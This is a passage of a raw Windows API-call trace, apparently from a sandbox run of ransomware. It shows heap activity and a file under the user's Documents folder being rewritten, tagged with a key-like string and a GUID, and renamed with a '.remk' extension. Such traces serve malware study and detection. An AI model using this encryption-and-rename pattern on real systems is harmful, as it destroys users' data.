HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x74f0) returned 0x37c4278 [0235.116] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c890 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c8d8 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea00 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.117] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0235.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0235.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea00 | out: hHeap=0x630000) returned 1 [0235.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea00 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9b8 [0235.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee9a0 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea00 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.118] GetCurrentThreadId () returned 0x314 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3e20 [0235.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.119] GetCurrentThreadId () returned 0x314 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea00 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0235.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea18 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9e8 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eea30 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9d0 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0235.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea00 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea30 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9d0 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea18 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c8d8 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.124] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x74e1, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x74e1, lpOverlapped=0x0) returned 1 [0235.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0235.124] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.124] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.125] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.125] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.125] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.125] CloseHandle (hObject=0x640) returned 1 [0235.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0235.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0235.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0235.127] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.remk")) returned 1 [0235.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0235.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.129] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.130] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0235.130] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0235.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694ec0 | out: hHeap=0x630000) returned 1 [0235.130] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0235.131] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0235.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0235.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0235.133] RtlAllocateHeap 